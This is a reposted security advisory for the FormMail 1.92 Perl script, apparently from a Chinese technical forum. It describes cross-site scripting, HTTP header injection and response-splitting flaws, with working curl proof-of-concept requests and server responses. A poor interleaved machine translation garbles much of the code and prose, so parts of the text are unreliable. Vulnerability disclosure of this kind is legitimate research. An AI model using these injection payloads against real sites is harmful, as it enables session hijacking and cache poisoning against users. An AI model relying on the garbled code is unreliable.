* FormMail version 1.92 * FormMail版本1.92
A) Prelude to the vulnerabities 甲)前奏vulnerabities
What follows is the code used to validate the user input:以下是代码用来验证用户输入:
Line 283: $safeConfig array definition.行283 : $ safeConfig数组的定义。
foreach $field (keys %Config) { foreach $字段(键%配置) (
$safeConfig{$field} = &clean_html($Config{$field}); $ safeConfig ( $外地) = & clean_html ( $配置( $外地) ) ;
} )
Line 518: definition of clean_html function, used to generate the "$safeConfig" array from "$Config". 518线:定义clean_html功能,用以产生“ $ safeConfig ”数组“ $配置” 。
# This function will convert <, >, & and " to their HTML equivalents. sub clean_html { #这一功能将转换“ , ” , &和“他们的HTML现金等价物。分clean_html (
local $value = $_[0]; 当地$值= $ _ [ 0 ] ;
$value =~ s/\&/\&/g; $值= ?的S / \ & / \ & /克;
$value =~ s/$value =~ s/>/\>/g; $值= ?的S / “ / \ ” /克;
$value =~ s/"/\"/g; return $value; $值= ?的S / “ / \ ” /克;返回$价值;
} )
These functions are not always applied to the user input and don't protect against all the attack vectors (as URI or DOM XSS that can work also if encoded), this is why various vulnerabilities exist.这些功能并不总是适用于用户输入,并没有防范所有的攻击媒介(如URI或跨站脚本的DOM还可以工作,如果编码) ,这就是为什么不同的安全漏洞存在。
B) Cross Site Scripting vulnerability b )跨站点脚本漏洞
Line 293: the "redirect" variable is used to write the location header value.线293 :在“重定向”的变数是用来写的位置标头值。 Its value is not filtered so it's possible to perform both HTTP Header Injection and an HTTP Response Splitting attacks.它的价值是无法过滤掉,因此有可能以执行两个HTTP头注射液和HTTP响应拆分攻击。
Since Header Injection is one of the most versatile attack vectors we could use it (like "downgrade it") to perform a Cross Site Scripting attack but it would not represent a different vulnerability.自头注射液是一种最通用的攻击媒介,我们可以使用它(如“降级为” )执行一个跨站点脚本攻击,但它并不代表一个不同的脆弱性。
In this case we are already inside a "Location" response header and it's possible to perform an XSS without splitting the response and using the standard Apache page for the 302 Found HTTP status.在这种情况下,我们已经在一个“位置”响应头和有可能执行跨站脚本没有分裂的反应和使用标准的Apache网页找到的302 HTTP状态。
# If redirect option is used, print the redirectional location header. #如果重新选择使用,打印头的redirectional位置。 if ($Config{'redirect'}) {print "Location: $safeConfig{'redirect'}\n\n"; 如果( $配置( '重定向' ) ) (打印“地点: $ safeConfig ( '重定向' ) \ n \ n已” ;
} )
XSS vulnerability example: XSS漏洞例如:
http://127.0.0.1/FormMail.pl?recipient=evilaliv3@ush.it&subject=1&redirect=javascript:alert(%27USH%27); http://127.0.0.1/FormMail.pl?recipient=evilaliv3 @ ush.it &主题= 1 &重定向= JavaScript的:警报( % 27USH % 27 ) ;
Response:答复:
$ curl -kis "http://127.0.0.1/FormMail.pl?recipient=evilaliv3@ush.it&subject=1&redirect=javascript:alert(%27USH%27);" $卷曲,简报“ http://127.0.0.1/FormMail.pl?recipient=evilaliv3 @ ush.it &主题= 1 &重定向= JavaScript的:警报( % 27USH % 27 ) ; ”
HTTP/1.1 302 Found HTTP/1.1 302找不到
Date: Sat, 11 Apr 2009 14:12:11 GMT 日期: Sat , 09年4月11日格林尼治标准时间 14点12分11秒
Server: Apache 服务器:阿帕奇
Location: javascript:alert('USH'); 地点: JavaScript的:警报( ' USH ' ) ;
Content-Length: 267 内容长度: 267
Content-Type: text/html; charset=iso-8859-1 内容类型:文字/的HTML ;字符=的ISO - 8859 - 1
“ !文档的HTML公众” - / /的IETF / / DTD的的HTML 2.0 / /英文“ ”
的
302 Found的 302找到“ /标题” <br></head><body> “ /头” <body> <br><h1>Found</h1> <h1>找到“ / H1基因” <br><p>The document has moved <a href="javascript:alert('USH');">here</a>.</p> <p>在文件已移到的<a href="javascript:alert('USH');">这里“ / 1 ” 。 “ /人” <br><hr> <hr>快来 <br><address>Apache Server at 127.0.0.1 Port 80</address> <address> Apache服务器在127.0.0.1端口80 “ /地址” <br></body></html> “ /体” “ /的HTML ” <br><br>Obiously the XSS is not automatic since browsers don't follow the "javascript:" URI handler in the "Location" header. Obiously的跨站脚本不是自动从浏览器不遵守“的JavaScript : ”的URI处理程序中的“所在地”的标题。 <br><br>A second XSS vulnerability, not based on HTTP tricks, exists: in the following code the the "$return_link" variable is reflected (printed) in the page body without any validation:第二个XSS漏洞,而不是基于HTTP过关,是否存在:在下面的代码的“ $ return_link ”变量是反映(印刷)的网页身体没有任何验证: <br><br>Line 371: the "$return_link" variable is printed in the page body without any validation. 线371 :在“ $ return_link ”可变印刷机构的网页没有任何验证。 <br><br># Check for a Return Link and print one if found. #检查恢复Link和打印 , 如果发现。 # # <br>if ($Config{'return_link_url'} && $Config{'return_link_title'}) { 如果( $配置( ' return_link_url ' ) & & $配置( ' return_link_title ' ) ) ( <br>print "<ul>\n"; 打印“ <ul> \ N ”的; <br>print "<li><a href=\"$safeConfig{'return_link_url'}\">$safeConfig{'return_link_title'}</a>\n"; 打印“ <li>的<a href=\"$safeConfig{'return_link_url'}\"> $ safeConfig ( ' return_link_title ' ) ” / 1 “ \ N ”的; <br>print "</ul>\n"; 打印“ ” / UL认证“ \ N ”的; <br>} ) <br><br>The vulnerability can be triggered with the following request:该漏洞可引发以下要求: <br><br>$ curl -kis "http://127.0.0.1/FormMail.pl?recipient=evilaliv3@ush.it&subject=1&return_link_url=javascript:alert(%27USH%27);&return_link_title=USH" $卷曲,简报“ http://127.0.0.1/FormMail.pl?recipient=evilaliv3 @ ush.it &主题= 1 & return_link_url = JavaScript的:警报( % 27USH % 27 ) ;及return_link_title = USH ” <br><br>This XSS is not automatic.这一跨站脚本是不是自动的。 <br><br>C) HTTP Response Header Injection 丙类)的HTTP响应头注射液 <br><br>An HTTP Response Header Injection vulnerability exists, the following request triggers the vulnerability:一个HTTP响应头注射漏洞存在,下列请求触发漏洞: <br><br>$ curl -kis "http://127.0.0.1/FormMail.pl?recipient=evilaliv3@ush.it&subject=1&redirect=http://www.example.com%0D%0aSet-Cookie:auth%3DUSH;vuln%3 DHTTPHeaderInjection;" $卷曲,简报“ http://127.0.0.1/FormMail.pl?recipient=evilaliv3 @ ush.it &主题= 1 &重定向= http://www.example.com %状况0D % 0aSet - Cookie :在授权% 3DUSH ; vuln % 3 DHTTPHeaderInjection ; “ <br><br>Can be verified with the obvious "javascript:alert(document.cookie)".可以验证的明显的“ JavaScript的:警报( document.cookie ) ” 。 <br><br>D) HTTP Response Splitting 丁) HTTP响应分裂 <br><br>Thanks to the full exploitability of the Header Injection vulnerability an HTTP Response Splitting can be performed.由于充分开发性的标题注射漏洞的HTTP响应分裂就可以执行。 <br><br>The following request is an example of the attack:下列请求就是一个例子攻击: <br><br>http://127.0.0.1/FormMail.pl?recipient=evilaliv3@ush.it&subject=1&redirect=http://www.ush.it%0D%0A%0FContent-Length: http://127.0.0.1/FormMail.pl?recipient=evilaliv3 @ ush.it &主题= 1 &重定向= http://www.ush.it %状况0D %答% 0FContent长度: <br>%200%0D%0AContent-Type:%20text/plain%0D%0AStatus:302%0D%0A%0D%0AHTTP/1.1%20200%20OK%0D%0A % , 200 %的状况0D % 0AContent类型: % 20text/plain %状况0D % 0AStatus : 302 %状况0D %答%状况0D % 0AHTTP/1.1 %二点〇二〇万% 20OK %状况0D %答 <br>Content-Type:%20text/plain%0D%0Ahttp://www.ush.it内容类型: % 20text/plain %状况0D % 0Ahttp : / / www.ush.it <br><br>$ curl -kis "http://127.0.0.1/FormMail.pl?recipient=evilaliv3@ush.it&subject=1&redirect=%0D%0A%0FContent-Length:%200%0D%0A $卷曲,简报“ http://127.0.0.1/FormMail.pl?recipient=evilaliv3 @ ush.it &主题= 1 &重定向= %状况0D %答% 0FContent长度: % 200 %的状况0D %答 <br>Content-Type:%20text/plain%0D%0AStatus:302%0D%0A%0D%0AHTTP/1.1%20200%20OK%0D%0AContent-Type:%20内容类型: % 20text/plain %状况0D % 0AStatus : 302 %状况0D %答%状况0D % 0AHTTP/1.1 %二点○二○万% 20OK %状况0D % 0AContent型: % 20 <br>text/plain%0D%0Ahttp://www.ush.it"文/平原%状况0D % 0Ahttp : / / www.ush.it “ <br><br>HTTP/1.1 302 Found HTTP/1.1 302找不到 <br>Date: Sun, 12 Apr 2009 23:01:18 GMT日期: Sun , 2009年4月12日格林尼治标准时间23时01分18秒 <br>Server: Apache服务器:阿帕奇 <br>Content-Length: 0内容长度: 0 <br>Location:地点: <br>Transfer-Encoding: chunked传输编码:区块 <br>Content-Type: text/plain内容类型:文字/纯 <br><br>HTTP/1.1 200 OK HTTP/1.1 200行 <br>Content-Type: text/plain内容类型:文字/纯 <br>http://www.ush.it http://www.ush.it <br><br>HTTP Response Splitting can be used to trigger a number of different vectors, ranging from automatic Reflected XSS to Browser and Proxy Cache Poisoning. HTTP响应分裂可以用来触发了一些不同的载体,从自动反射跨站脚本,向浏览器和代理缓存中毒。 <br><br>Disclosure Timeline: 披露时间表: <br>20070501 Bug discovered 20070501错误发现 <br>20070531 Initial vendor contact -- No response 20070531初始供应商联系-无反应 <br>20090505 Second vendor contact -- No response 20090505第二供应商联系-无反应 <br>20090511 Advisory Release 20090511咨询发布<br><br></td></tr></table>
<!--[diy=diycontentbottom]--><div id="diycontentbottom" class="area"></div><!--[/diy]-->
<script src="data/cache/home.js?R1y" type="text/javascript"></script>
<div id="click_div"><table cellpadding="0" cellspacing="0" class="atd">
<tr></tr>
</table>
<script type="text/javascript">
function errorhandle_clickhandle(message, values) {
if(values['id']) {
showCreditPrompt();
show_click(values['idtype'], values['id'], values['clickid']);
}
}
</script>
</div>
<!--[diy=diycontentclickbottom]--><div id="diycontentclickbottom" class="area"></div><!--[/diy]-->
</div>
<div class="o cl ptm pbm">
<a href="https://bbs.weiying.cn/home.php?mod=spacecp&ac=favorite&type=article&id=115131&handlekey=favoritearticlehk_115131" id="a_favorite" onclick="showWindow(this.id, this.href, 'get', 0);" class="oshr ofav">收藏</a>
<a href="https://bbs.weiying.cn/home.php?mod=spacecp&ac=share&type=article&id=115131&handlekey=sharearticlehk_115131" id="a_share" onclick="showWindow(this.id, this.href, 'get', 0);" class="oshr">分享</a>
<a href="misc.php?mod=invite&action=article&id=115131" id="a_invite" onclick="showWindow('invite', this.href, 'get', 0);" class="oshr oivt">邀请</a>
</div>
</div>
<!--[diy=diycontentrelatetop]--><div id="diycontentrelatetop" class="area"></div><!--[/diy]-->
<!--[diy=diycontentrelate]--><div id="diycontentrelate" class="area"></div><!--[/diy]-->
<div id="comment" class="bm">
<div class="bm_h cl">
<h3>最新评论</h3>
</div>
<div id="comment_ul" class="bm_c"><form id="cform" name="cform" action="portal.php?mod=portalcp&ac=comment" method="post" autocomplete="off">
<div class="tedt">
<div class="area">
<textarea name="message" rows="3" class="pt" id="message" onkeydown="ctrlEnter(event, 'commentsubmit_btn');"></textarea>
</div>
</div>
<input type="hidden" name="portal_referer" value="portal.php?mod=view&aid=115131#comment">
<input type="hidden" name="referer" value="portal.php?mod=view&aid=115131#comment" />
<input type="hidden" name="id" value="0" />
<input type="hidden" name="idtype" value="" />
<input type="hidden" name="aid" value="115131">
<input type="hidden" name="formhash" value="a90d8003">
<input type="hidden" name="replysubmit" value="true">
<input type="hidden" name="commentsubmit" value="true" />
<p class="ptn"><button type="submit" name="commentsubmit_btn" id="commentsubmit_btn" value="true" class="pn"><strong>评论</strong></button></p>
</form>
</div>
</div>
<!--[diy=diycontentcomment]--><div id="diycontentcomment" class="area"></div><!--[/diy]-->
</div>
<div class="sd pph">
<div class="drag">
<!--[diy=diyrighttop]--><div id="diyrighttop" class="area"></div><!--[/diy]-->
</div>
<div class="bm">
<div class="bm_h cl">
<h2>相关分类</h2>
</div>
<div class="bm_c">
<ul class="xl xl2 cl"><li><a href="https://bbs.weiying.cn/portal.php?mod=list&catid=47">CMS</a></li>
<li><a href="https://bbs.weiying.cn/portal.php?mod=list&catid=82">BBS</a></li>
<li><a href="https://bbs.weiying.cn/portal.php?mod=list&catid=90">SHOP</a></li>
<li><a href="https://bbs.weiying.cn/portal.php?mod=list&catid=91">站长知道</a></li>
</ul>
</div>
</div>
<div class="drag">
<!--[diy=diy2]--><div id="diy2" class="area"></div><!--[/diy]-->
</div>
</div>
</div>
<div class="wp mtn">
<!--[diy=diy3]--><div id="diy3" class="area"></div><!--[/diy]-->
</div>
<input type="hidden" id="portalview" value="1"> </div>
<div id="ft" class="wp cl">
<div id="flk" class="y">
<p>
<a href="//wpa.qq.com/msgrd?v=3&uin=8828254&site=微赢网络技术论坛&menu=yes&from=discuz" target="_blank" title="QQ"><img src="static/image/common/site_qq.jpg" alt="QQ" /></a><span class="pipe">|</span><a href="https://bbs.weiying.cn/forum.php?mod=misc&action=showdarkroom" >小黑屋</a><span class="pipe">|</span><a href="topic-sitemap.html" target="_blank" >最新主题</a><span class="pipe">|</span><a href="https://bbs.weiying.cn/forum.php?showmobile=yes" >手机版</a><span class="pipe">|</span><strong><a href="http://bbs.weiying.cn" target="_blank">微赢网络技术论坛</a></strong>
( <a href="https://beian.miit.gov.cn/" target="_blank">苏ICP备08020429号</a> )<script>
var _hmt = _hmt || [];
(function() {
var hm = document.createElement("script");
hm.src = "https://hm.baidu.com/hm.js?a66c064273122db3a05de72f6cd924eb";
var s = document.getElementsByTagName("script")[0];
s.parentNode.insertBefore(hm, s);
})();
</script></p>
<p class="xs0">
GMT+8, 2024-10-1 15:24<span id="debuginfo">
, Processed in 0.250712 second(s), 12 queries
, Gzip On, MemCache On.
</span>
</p>
</div>
<div id="frt">
<p>Powered by <strong><a href="https://www.discuz.vip/" target="_blank">Discuz!</a></strong> <em>X3.5</em></p>
<p class="xs0">© 2001-2023 <a href="https://code.dismall.com/" target="_blank">Discuz! Team</a>.</p>
</div></div>
<script src="home.php?mod=misc&ac=sendmail&rand=1727767451" type="text/javascript"></script>
<div id="scrolltop">
<span hidefocus="true"><a title="返回顶部" onclick="window.scrollTo('0','0')" class="scrolltopa" ><b>返回顶部</b></a></span>
</div>
<script type="text/javascript">_attachEvent(window, 'scroll', function () { showTopLink(); });checkBlind();</script>
</body>
</html>
|
